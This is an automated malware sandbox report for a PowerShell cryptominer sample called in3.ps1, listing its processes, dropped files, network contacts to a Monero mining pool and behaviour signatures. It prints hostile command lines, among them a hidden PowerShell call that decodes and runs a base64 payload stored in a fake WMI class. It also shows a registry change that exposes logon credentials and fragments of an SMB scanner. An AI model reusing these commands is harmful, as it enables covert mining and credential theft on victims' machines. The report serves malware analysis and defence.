ID: Sample Name: in3.ps1 Cookbook: default.jbs Time: 04:05:00 Date: 24/01/2018 Version:

Size: px

Start display at page:

Download "ID: Sample Name: in3.ps1 Cookbook: default.jbs Time: 04:05:00 Date: 24/01/2018 Version:"

Ami Jenkins
5 years ago
Views:

1 ID: Sample Name: in3.ps1 Cookbook: default.jbs Time: 04:05:00 Date: 24/01/2018 Version:

2 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence Classification Analysis Advice Signature Overview AV Detection: Networking: Boot Survival: Persistence and Installation Behavior: Data Obfuscation: Spreading: System Summary: HIPS / PFW / Operating System Protection Evasion: Anti Debugging: Malware Analysis System Evasion: Hooking and other Techniques for Hiding and Protection: Language, Device and Operating System Detection: Behavior Graph Simulations Behavior and APIs Antivirus Detection Initial Sample Dropped Files Domains Yara Overview Initial Sample PCAP (Network Traffic) Dropped Files Memory Dumps Unpacked PEs Joe Sandbox View / Context IPs Domains ASN Dropped Files Screenshot Startup Created / dropped Files Contacted Domains/Contacted IPs Contacted Domains Contacted IPs Static File Info File Icon Network Behavior Network Port Distribution TCP Packets UDP Packets DNS Queries Copyright Joe Security LLC 2018 Page 2 of 26

3 DNS Answers Code Manipulations Statistics Behavior System Behavior Analysis Process: powershell.exe PID: 3084 Parent PID: 2836 File Activities File Created File Deleted File Written Registry Activities Key Value Created Analysis Process: schtasks.exe PID: 3356 Parent PID: 3084 Analysis Process: powercfg.exe PID: 3368 Parent PID: 3084 Analysis Process: powercfg.exe PID: 3376 Parent PID: 3084 Analysis Process: powercfg.exe PID: 3384 Parent PID: 3084 Analysis Process: NETSTAT.EXE PID: 3392 Parent PID: 3084 File Activities Analysis Process: csc.exe PID: 3416 Parent PID: 3084 File Activities Analysis Process: cvtres.exe PID: 3424 Parent PID: 3416 File Activities Analysis Process: NETSTAT.EXE PID: 3440 Parent PID: 3084 File Activities Analysis Process: powershell.exe PID: 3464 Parent PID: 3084 File Activities File Created File Deleted File Written Analysis Process: csc.exe PID: 3552 Parent PID: 3464 Analysis Process: cvtres.exe PID: 3564 Parent PID: 3552 Analysis Process: NETSTAT.EXE PID: 3596 Parent PID: 3084 Disassembly Code Analysis Copyright Joe Security LLC 2018 Page 3 of 26

Analysis Report Overview Information Joe Sandbox Version: 20.0.0 Analysis ID: 43655 Start time: 04:05:00 Joe Sandbox Product: CloudBasic Start date: 24.01.

4 Analysis Report Overview Information Joe Sandbox Version: Analysis ID: Start time: 04:05:00 Joe Sandbox Product: CloudBasic Start date: Overall analysis duration: Hypervisor based Inspection enabled: Report type: Sample file name: Cookbook file name: 0h 5m 57s light in3.ps1 default.jbs Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java ) Number of analysed new started processes analysed: 19 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies Detection: Classification: MAL HCA enabled EGA enabled HDC enabled mal80.evad.troj.winps1@25/21@1/1 HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 EGA Information: HDC Information: Cookbook Comments: Warnings: Failed Failed Found application associated with file extension:.ps1 Show All Exclude process from analysis (whitelisted): WmiPrvSE.exe, WmiApSrv.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java,.Net, VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, csc.exe Detection Strategy Score Range Reporting Detection Threshold Report FP / FN Copyright Joe Security LLC 2018 Page 4 of 26

Threshold 5 0-5 Confidence Classification

clean Exploiter Banker Spyware Trojan / Bot

which have not been started, submit dropped

5 Confidence Strategy Score Range Further Analysis Required? Threshold Confidence Classification Ransomware Miner Spreading malicious malicious malicious Evader Phishing suspicious suspicious suspicious clean clean clean Exploiter Banker Spyware Trojan / Bot Adware Analysis Advice Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox Copyright Joe Security LLC 2018 Page 5 of 26

6 Signature Overview AV Detection Networking Boot Survival Persistence and Installation Behavior Data Obfuscation Spreading System Summary HIPS / PFW / Operating System Protection Evasion Anti Debugging Malware Analysis System Evasion Hooking and other Techniques for Hiding and Protection Language, Device and Operating System Detection Click to jump to signature section AV Detection: Antivirus detection for submitted file Networking: Performs DNS lookups Detected TCP or UDP traffic on non-standard ports Uses netstat to query active network connections and open ports Boot Survival: Uses schtasks.exe or at.exe to add and modify task schedules Persistence and Installation Behavior: Drops PE files Data Obfuscation: Compiles C# or VB.Net code Suspicious powershell command line found Spreading: Creates COM task schedule object (often to register a task for autostart) Enumerates the file system System Summary: Uses Microsoft Silverlight Submission file is bigger than most known malware samples Uses new MSVCR Dlls Binary contains paths to debug symbols Classification label Creates files inside the user directory Creates temporary files Found command line output Copyright Joe Security LLC 2018 Page 6 of 26

7 Parts of this applications are using the.net runtime (Probably coded in C#) Queries process information (via WMI, Win32_Process) Reads ini files Reads software policies Sample is known by Antivirus (Virustotal or Metascan) Spawns processes Uses an in-process (OLE) Automation server Creates mutexes PE file does not import any functions Reads the hosts file Powershell connects to network Uses powercfg.exe to modify the power settings HIPS / PFW / Operating System Protection Evasion: Very long cmdline option found, this is very uncommon (may be encrypted or packed) Anti Debugging: Creates guard pages, often used to prevent reverse engineering and debugging Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) Enables debug privileges Malware Analysis System Evasion: Queries a list of all running processes Enumerates the file system Found dropped PE file which has not been started or loaded May sleep (evasive loops) to hinder dynamic analysis Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines) Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) Hooking and other Techniques for Hiding and Protection: Disables application error messsages (SetErrorMode) System process connects to network (likely due to code injection or exploit) Language, Device and Operating System Detection: Queries the cryptographic machine GUID Queries the installation date of Windows Queries the volume information (name, serial number etc) of a device Behavior Graph Copyright Joe Security LLC 2018 Page 7 of 26

Behavior Graph Hide Legend ID: 43655 Legend: Sample: in3.

8 Behavior Graph Hide Legend ID: Legend: Sample: in3.ps1 Process Startdate: 24/01/2018 Architecture: WINDOWS Signature Score: 80 Created File Antivirus detection for submitted file Suspicious powershell command line found Detected TCP or UDP traffic on non-standard ports 3 other signatures started DNS/IP Info Is Dropped powershell.exe Is Windows Process 1 12 Number of created Registry Values Number of created Files Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) Suspicious powershell command line found started started started Visual Basic Delphi powershell.exe NETSTAT.EXE csc.exe Java other processes.net C# or VB.NET C, C++ or other language xmr-eu1.nanopool.org Is malicious , 14444, dropped dropped OVHFR France started unknown, ASCII C:\Users\user\AppData\Local\...\rjax4qnu.dll, PE32 started Detected TCP or UDP traffic on non-standard ports System process connects to network (likely due to code injection or exploit) Powershell connects to network csc.exe cvtres.exe dropped C:\Users\user\AppData\Local\...\oyswbnum.dll, PE32 started cvtres.exe Simulations Behavior and APIs Time Type Description 04:05:17 API Interceptor 187x Sleep call for process: powershell.exe modified from: 60000ms to: 100ms Antivirus Detection Initial Sample Detection Cloud Link in3.ps1 25% virustotal Browse Dropped Files No Antivirus matches Domains Copyright Joe Security LLC 2018 Page 8 of 26

9 Detection Cloud Link xmr-eu1.nanopool.org 0% virustotal Browse Yara Overview Initial Sample No yara matches PCAP (Network Traffic) No yara matches Dropped Files No yara matches Memory Dumps No yara matches Unpacked PEs No yara matches Joe Sandbox View / Context IPs No context Domains No context ASN No context Dropped Files No context Screenshot Copyright Joe Security LLC 2018 Page 9 of 26

$Startup System is w7 powershell.exe (PID: 3084 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nologo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\in3.$

10 Startup System is w7 powershell.exe (PID: 3084 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nologo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\in3.ps1' 92F44E405DB16AC55D97E3BFE3B132FA) schtasks.exe (PID: 3356 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f 2003E9B15E1C502B146DAD2E383AC1E3) powercfg.exe (PID: 3368 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0 98E7E971AB21A6EDD2323C0FB37B9A0F) powercfg.exe (PID: 3376 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0 98E7E971AB21A6EDD2323C0FB37B9A0F) powercfg.exe (PID: 3384 cmdline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca e45-459f-a27b-476b1d01c E7E971AB21A6EDD2323C0FB37B9A0F) NETSTAT.EXE (PID: 3392 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp 32297BB17E6EC700D0FC869F9ACAF561) csc.exe (PID: 3416 cmdline: 'C:\Windows\Microsoft.NET\Framework\v \csc.exe' /noconfig 0A1C81BDCB030222A0B0A652B2C89D8D) cvtres.exe (PID: 3424 cmdline: C:\Windows\Microsoft.NET\Framework\v \cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL ~1\AppData\Local\Temp\RES27A9.tmp' 'c:\users\user\appdata\local\temp\csc278a.tmp' 200FC355F85ECD4DB77FB3CAB2D01364) NETSTAT.EXE (PID: 3440 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp 32297BB17E6EC700D0FC869F9ACAF561) powershell.exe (PID: 3464 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:office_updater' ).Properties['mon'].Value;$funs = ([WmiClass] 'root\default:office_updater').properties['funs'].value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64Stri ng($funs)));invoke-command -ScriptBlock $RemoteScriptBlock $mon, 'Void', 0, '', '')' 92F44E405DB16AC55D97E3BFE3B132FA) csc.exe (PID: 3552 cmdline: 'C:\Windows\Microsoft.NET\Framework\v \csc.exe' /noconfig 0A1C81BDCB030222A0B0A652B2C89D8D) cvtres.exe (PID: 3564 cmdline: C:\Windows\Microsoft.NET\Framework\v \cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL ~1\AppData\Local\Temp\RES760E.tmp' 'c:\users\user\appdata\local\temp\csc75bc.tmp' 200FC355F85ECD4DB77FB3CAB2D01364) NETSTAT.EXE (PID: 3596 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp 32297BB17E6EC700D0FC869F9ACAF561) cleanup Created / dropped Files Copyright Joe Security LLC 2018 Page 10 of 26

11 C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp data Size (bytes): 2064 Entropy (8bit): D038C64CEA66482AFA677C82DAF51 9A32E620E8D6304DE70B C9E7F2D713A8F 4FAA5DDFB32BE482108B1D2A79C26C07C470F4D2DEF23B5A197067A52E3E0A0E 8F0E13F4C8BC63B44CA869E65577B89BA137F4D56BF1C11F086D6ED3E2E AD1E47767D72EAECACFF BE5E51FFF339A03F7EB4CDAAB1E6D03F39B1 C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp data Size (bytes): 2064 Entropy (8bit): A474218BD4F476ED92D26B126EBDCF0 98DE35CBBC45CDF8AFC6A165DFD671D2CCD42A CDA30F91AD2C0CA5F5BD71063C D9D7FCCD AF729950C4 CB865F C88F7836F2E804E6ED86C8092F264C093B5DCC39C AC9DCE8A012DEFFA035A81D03A11E B4D893200BEC5C9DD0989F992E32547C C:\Users\user\AppData\Local\Temp\CSC278A.tmp Size (bytes): 652 MSVC.res Entropy (8bit): DC ABDB9110FCDD83DADD6F50 26C992C087A55E3D47259F9B0893AA8762AD F6C716656DCA362067B213EA0E F2A7DCD2679BBEF6D369BC43043F3 B70A9E277408F8B322DDC1D357E797A20DF68734FFBDC0B703E386D5AB5E80E4EE66A728DA02CA4CBBFA0378E 7EAFEF5147E0D063771B EBE8D446E891 C:\Users\user\AppData\Local\Temp\CSC75BC.tmp Size (bytes): 652 MSVC.res Entropy (8bit): F8D1329C0DA5ACC9E8346D75091E03 C DE9A7299DE3F EFAFEBDA6CC6 6C90A8C7F20E8DDE07C5B892F0C61B232C384480C43B5628EEA474A9BE F6673E C358C4ABFA C54D7B91A39565EFE BD5DD0C57566B1A4F C4693 D86D88CCDC F673D3E2A89B5BC C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs Size (bytes): 5826 Entropy (8bit): UTF-8 Unicode (with BOM) text, with CRLF line terminators BE45C5DB7A9A66F35401E2B00BBDB DC7D3F4D6F80359B0BA99081C0B6705F CEEFFDD10ECE58A1B0F298BF4BD2CA65E1EF5CD50248F89F89870E21C7E5E3B A33F9D0FCA8ED8513CB9F16155C124C3259C56D7C8B90B B275B2ECA7006D7CB1A45A5EBE60 075D459DFF71C21C181B26D0E66034AB0DF4F C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators Copyright Joe Security LLC 2018 Page 11 of 26

12 C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline Size (bytes): 327 Entropy (8bit): EA4DA1BF55F3671A53FF6F74EDF4C9A8 E368BEC9625DD399BBD9D06E FE20EA689 A72635BD6630F9F5837B67FD30EE0EC820EC64C10DD16E1C77B66B26FE4F424C E26A35C1B70F0B816A415C40A3582E65BE28AFDB6CA765C7049FCC3674FFC8AAE854D44146E14465AC818AD67D E8F88F0152A04A44738CBD2E1751FACDB47A9C C:\Users\user\AppData\Local\Temp\oyswbnum.dll Size (bytes): 6656 Entropy (8bit): PE32 executable (DLL) (console) Intel Mono/.Net assembly, for MS Windows 6A0F2C890C628D0803C0B96F50C80ED9 0F562FB8C8A03B81C9EB A1228AC460C0 4F4ACA1FF2861E962A710E6FFBB585F7103D823FCF96C79E1A D889 9E770DFEE67FD219C42D12E32A2FDAC42EABA80FD5F3F3546DBAEF54BE2E2703A29037B17F025BEEB1FD BC1184F61AC13A8D2E64E50F489AE655DD188 C:\Users\user\AppData\Local\Temp\oyswbnum.out Size (bytes): 198 ASCII text, with CRLF line terminators Entropy (8bit): BFDFB548627BEC18305C7EE FD5A8D41B C0DC21116CFA689CED8AABE 5026CA6D4A10F43342AC0AD1E D1E32DE5EAA6E9478BDA11FCA1B A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D736 28FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0 C:\Users\user\AppData\Local\Temp\oyswbnum.pdb data Size (bytes): Entropy (8bit): D1C6D77F067F AC25 D9426E4795BC8E95C0387A95CA5C61B1E734B866 B58FC894BBF E257C1CF872AA019683D7A08809C8C12EFCCAD090F A5E C8D0A960A7DE0F4FF7F736A1D52B5B3F D106559E2DF2D8828A76C2F91DCFEA7D20 5CCE13BAA9EDAE2E4A054A80C067F1A0BB0A5 C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs Size (bytes): 5826 Entropy (8bit): UTF-8 Unicode (with BOM) text, with CRLF line terminators BE45C5DB7A9A66F35401E2B00BBDB DC7D3F4D6F80359B0BA99081C0B6705F CEEFFDD10ECE58A1B0F298BF4BD2CA65E1EF5CD50248F89F89870E21C7E5E3B A33F9D0FCA8ED8513CB9F16155C124C3259C56D7C8B90B B275B2ECA7006D7CB1A45A5EBE D459DFF71C21C181B26D0E66034AB0DF4F C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators Size (bytes): 327 Copyright Joe Security LLC 2018 Page 12 of 26

13 C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline Entropy (8bit): FBBECDED4237D6D968AB6F63D4ED1AF8 0E51A762F7C860A0A2DDD291FA933F4F3197F3AA D3CA342B07621A DC64355F09099E8EDD FF488B3B8B4ACA0 5F10C8B6669E2108C6852A23B0D5EF4FC379E1264C058139B7D8F26F519AD6E5399BDA052D9B7FEF0F5EA AB5907CDCC3FB06C7B DF9C4D1A4EC C:\Users\user\AppData\Local\Temp\rjax4qnu.dll Size (bytes): 6656 Entropy (8bit): PE32 executable (DLL) (console) Intel Mono/.Net assembly, for MS Windows 3B28DD0B534D180BBA0AC5BDA E143343B330B7BC88290D20E95A0CED1346BD2BB 8B5276B2F47F565E02494E9E19C36E D0F3D908CF6DD69B1711D8BAB9 CAF5CF31DBCE06D4BD09AD849FC E6A7D68960D2C018988A8A7CA76DBCAF C08A0B3E5E73E8 5E0D A5833AFA91EFD4E38C11D1CBD84 C:\Users\user\AppData\Local\Temp\rjax4qnu.out Size (bytes): 198 ASCII text, with CRLF line terminators Entropy (8bit): BFDFB548627BEC18305C7EE FD5A8D41B C0DC21116CFA689CED8AABE 5026CA6D4A10F43342AC0AD1E D1E32DE5EAA6E9478BDA11FCA1B A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D736 28FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0 C:\Users\user\AppData\Local\Temp\rjax4qnu.pdb data Size (bytes): Entropy (8bit): C358AFBC3D4424EA00140A14E00C9B3F EF19D F8CC7A0FB575BAA1AA57CE92C5E5 7E991ABE150A A870D5A348D64EEF2C7FFC77FA778BC22D4F691409EF2 FE71EA77CE35DC7F690FDC4207B50A498F5C58CA59D5E8630C3B6D22A1C2C5AC0C7E50F97A180EA2D3B055E9C 4B49E62B696DCF91DB990D737B9F0E0012E42C1 C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64QXU9TVGGU3OQHE5F7D.temp data Size (bytes): 8016 Entropy (8bit): B849D88D F28EC2F011BCEBDDC 09B8F87CCA AA8BEB79947DF1F26F7 AE67A28CC5DE7F765D4A55011A662C92B67AC87E3349F3B843932EB676ECE CF3C7DB5E186A0B5D770854B76B3CC D2EB D49A4A852088B5D11C95376ACFA0C560AE F9117EBA0D79416AA516EA19BA7714A0B5211 C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DEAK7SA58B6AXIB1VI01.temp data Size (bytes): 8016 Entropy (8bit): Copyright Joe Security LLC 2018 Page 13 of 26

14 C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DEAK7SA58B6AXIB1VI01.temp B849D88D F28EC2F011BCEBDDC 09B8F87CCA AA8BEB79947DF1F26F7 AE67A28CC5DE7F765D4A55011A662C92B67AC87E3349F3B843932EB676ECE CF3C7DB5E186A0B5D770854B76B3CC D2EB D49A4A852088B5D11C95376ACFA0C560AE F9117EBA0D79416AA516EA19BA7714A0B5211 unknown Size (bytes): 778 ASCII text, with CRLF line terminators Entropy (8bit): C68DB33AE59065AA87C180AE7DFEAB 36F6BAF7E0274B0EEDB98D58C FC5840B4 F B512142D132CAD14FD4C63EB225056C2E3E DE429F4DC224 BA41E52D5C18B6B5CBD0A2438C49024BF15E7E1054A0E2805DE074AFEF283CD4C86E8E12340A23B3BAC4C AD993AA FEB743C2D9C75F9D7B0CDF1 true Contacted Domains/Contacted IPs Contacted Domains Name IP Active Malicious Antivirus Detection xmr-eu1.nanopool.org true true 0%, virustotal, Browse Contacted IPs No. of IPs < 25% 25% < No. of IPs < 50% 50% < No. of IPs < 75% 75% < No. of IPs IP Country Flag ASN ASN Name Malicious France OVHFR true Copyright Joe Security LLC 2018 Page 14 of 26

15 Static File Info File type: Entropy (8bit): TrID: File name: ASCII text, with very long lines, with no line terminators in3.ps1 File size: SHA256: SHA512: File Content Preview: 9d2c27a1a6e18b0b815c938e05c03e7b 4ef882b05566dc706fbc604b1bf771e8c7dab86a f6e75f c92217da882fca45d7004e683c8122a 48a7b3bcec5356e1d d9b56bc6f495ff0bc417c79e1a69268ebaeac4a9e034b6a eb90f669f3f065dde251feeca1d71d9d021176e9 76bdd7eb4021b886d4494d76884a34d25c $fa='sltah+6b8aaaa5+hxvwityjewb+2aldeulwb xmafulbitmafhewvvdujhamazbyg0bwoxadfaswsn VU1dWQVdJiyhMi30IUl5MicsxwEQPIsBIiQKJwUj30Um JwLBAUMHgBlBJiQFIg+wgv+qZblfoZf///0iDxDCFwHVF SIs+SI01TQAAALkABgAA86RIi0XwSItAGEiLQCBIiwB mg3highx2sitquif6ddmamgb16uylecc/xlfeg+gi File Icon Network Behavior Network Port Distribution Total Packets: undefined 53 (DNS) TCP Packets Timestamp Port Dest Port IP Dest IP Jan 24, :07: CET Jan 24, :07: CET Jan 24, :07: CET Jan 24, :07: CET Jan 24, :07: CET Jan 24, :07: CET Jan 24, :07: CET Jan 24, :07: CET Jan 24, :07: CET Jan 24, :07: CET Copyright Joe Security LLC 2018 Page 15 of 26

16 UDP Packets Timestamp Port Dest Port IP Dest IP Jan 24, :07: CET Jan 24, :07: CET DNS Queries Timestamp IP Dest IP Trans ID OP Code Name Type Class Jan 24, :07: CET xd87d Standard query (0) xmr-eu1.na nopool.org A (IP address) IN (0x0001) DNS Answers Timestamp IP Dest IP Trans ID Replay Code Name CName Address Type Class Jan 24, xd87d No error (0) xmr-eu1.na 04:07: nopool.org CET A (IP address) IN (0x0001) Code Manipulations Statistics Behavior powershell.exe schtasks.exe powercfg.exe powercfg.exe powercfg.exe NETSTAT.EXE csc.exe cvtres.exe NETSTAT.EXE powershell.exe csc.exe cvtres.exe NETSTAT.EXE Click to jump to process System Behavior Analysis Process: powershell.exe PID: 3084 Parent PID: 2836 Start time: 04:05:14 Start date: 24/01/2018 Path: Wow64 process (32bit): Commandline: Imagebase: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nologo -ExecutionPolicy unres tricted -file 'C:\Users\user\Desktop\in3.ps1' 0x755c0000 Copyright Joe Security LLC 2018 Page 16 of 26

17 File size: MD5 hash: Programmed in: bytes 92F44E405DB16AC55D97E3BFE3B132FA.Net C# or VB.NET File Activities File Created File Path Access Attributes Options Completion Count C:\Users\user\AppData\Local\Temp\rjax4qnu.tmp C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs C:\Users\user\AppData\Local\Temp\rjax4qnu.dll C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline C:\Users\user\AppData\Local\Temp\rjax4qnu.out C:\Users\user\AppData\Local\Temp\rjax4qnu.err read attributes and synchroniz e and generic write read attributes and synchroniz e and generic write read attributes and synchroniz e and generic read and generic write read attributes and synchroniz e and generic write read attributes and synchroniz e and generic write read attributes and synchroniz e and generic write none none none none none none synchronous io non alert and n on directory file and open no recall synchronous io non alert and n on directory file and open no recall synchronous io non alert and n on directory file and open no recall synchronous io non alert and n on directory file and open no recall synchronous io non alert and n on directory file and open no recall synchronous io non alert and n on directory file and open no recall success or wait 1 1A1072F CreateFileW success or wait 1 1A1072F CreateFileW success or wait 1 1A1072F CreateFileW success or wait 1 1A1072F CreateFileW success or wait 1 1A1072F CreateFileW success or wait 1 1A1072F CreateFileW File Deleted File Path Completion Count C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.dll success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.tmp success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.pdb success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.err success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.out success or wait 1 1A101D2 DeleteFileW Old File Path New File Path Completion Count File Written File Path Offset Length Value Ascii Completion Count Copyright Joe Security LLC 2018 Page 17 of 26

18 File Path Offset Length Value Ascii Completion Count C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs unknown 4096 ef bb bf e 67...using System;..using d 3b 0d 0a e d 2e 43 6f 6c 6c f 6e 73 2e e b 0d 0a e d 2e e 6f b 0d 0a e d 2e 49 4f 3b 0d 0a 75 System.Collections.Generic;..usin g S ystem.diagnostics;..using System.IO;..using System.Net;..using System.Net.Sockets;..usin g System.Text;...namespac e PingCastle.Scanners.. {...public class m17sc... {...static public bool Scan(stri e d 2e 4e b 0d 0a e d 2e 4e e 53 6f 63 6b b 0d 0a e d 2e b 0d 0a 0d 0a 6e 61 6d e c 65 2e e 6e d 0a 7b 0d 0a c c d d 0a 09 7b 0d 0a c f 6f 6c e C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs unknown d 20 6e e d b 0d 0a b 5d d 20 6e b 5d 20 7b 0d 0a c c c c 20 0d 0a c c c c 20 0d 0a c 20 0d 0a c 20 0d 0a c 20 0d 0a c c 20 0d 0a c 20 0d 0a c c 20 0d 0a c c 20 0d 0a c c c c c c c success or wait 1 1A108E7 WriteFile der = new BinaryReader(ms);.....byte[] part1 = new byte[] {...0x00,0x00,0x00,0x00,...0xff,0x53,0x4d,0x42,...0x75,...0x00,...0x00,...0x00,0x00,...0x18,...0x01,0x28,...0x00,0x00,...0x00,0x00,0x00,0x00,0 x00,0x00,0x00,0x success or wait 1 1A108E7 WriteFile Copyright Joe Security LLC 2018 Page 18 of 26

19 File Path Offset Length Value Ascii Completion Count C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline unknown 327 ef bb bf 2f 74 3a 6c 69.../t:library /utf8output /R:" success or wait 1 1A108E7 WriteFile f f f 52 3a d 2e 64 6c 6c f 52 3a a 5c e 64 6f c d 62 6c 79 5c f 4d c 5c d 2e 4d 61 6e d 65 6e 74 System.dll" /R:"C:\Windows\ass embly\gac_msil\system. Manageme nt.automation\ bf385 6ad364e35\System.Manag ement.automation.dll" /out:"c:\users\u ser\appdata\local\temp\rj ax4qnu.dll" /D:DEBUG /debug+ /optimize- 2e f 6d f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 2e 64 6c 6c f 6f a a 5c c c b e 5c c 4c 6f c 5c d 70 5c 72 6a e 75 2e 64 6c 6c f 44 3a f b 20 2f 6f d 69 7a 65 2d 20 C:\Users\user\AppData\Local\Temp\rjax4qnu.out unknown 422 ef bb bf 43 3a 5c C:\Users\user\Desktop> success or wait 1 1A108E7 WriteFile c c b e 5c b 74 6f 70 3e a 5c e 64 6f c 4d 69 "C:\ Windows\Microsoft.NET\Fr amewor k\v \csc.exe" /t:library /utf8output /R:"System.dll" f 73 6f e /R:"C:\Windows\assembly\ 4e c d f 72 6b 5c e 30 2e c e f 74 3a 6c f GAC_M SIL\System.Management. Automati on\ bf3856ad36 4e35\S ystem.management.autom ation.dll" /o 38 6f f 52 3a d 2e 64 6c 6c f 52 3a a 5c e 64 6f c d 62 6c 79 5c f 4d c 5c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 5c 31 2e 30 2e 30 2e 30 5f 5f c d 2e 4d 61 6e d 65 6e 74 2e f 6d f 6e 2e 64 6c 6c f 6f Registry Activities Key Value Created Key Path Name Type Data Completion Count HKEY_LOCAL_MACHINE\SYSTEM\Cont rolset001\control\securityproviders\wdigest Address Symbol UseLogonCredential dword 1 success or wait 1 1A137EA RegSetValueExW Copyright Joe Security LLC 2018 Page 19 of 26

20 Analysis Process: schtasks.exe PID: 3356 Parent PID: 3084 Start time: 04:06:19 Start date: 24/01/2018 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f Imagebase: 0x774a0000 File size: bytes MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3 Programmed in: C, C++ or other language Analysis Process: powercfg.exe PID: 3368 Parent PID: 3084 Start time: 04:06:19 Start date: 24/01/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0 Imagebase: 0x File size: bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F Programmed in: C, C++ or other language Analysis Process: powercfg.exe PID: 3376 Parent PID: 3084 Start time: 04:06:19 Start date: 24/01/2018 Path: C:\Windows\System32\powercfg.exe Wow64 process (32bit): Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0 Imagebase: 0x File size: bytes MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F Programmed in: C, C++ or other language Analysis Process: powercfg.exe PID: 3384 Parent PID: 3084 Start time: 04:06:20 Start date: 24/01/2018 Path: Wow64 process (32bit): Commandline: Imagebase: File size: MD5 hash: C:\Windows\System32\powercfg.exe 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca e45-459f-a27b-476b1d01c x bytes 98E7E971AB21A6EDD2323C0FB37B9A0F Copyright Joe Security LLC 2018 Page 20 of 26

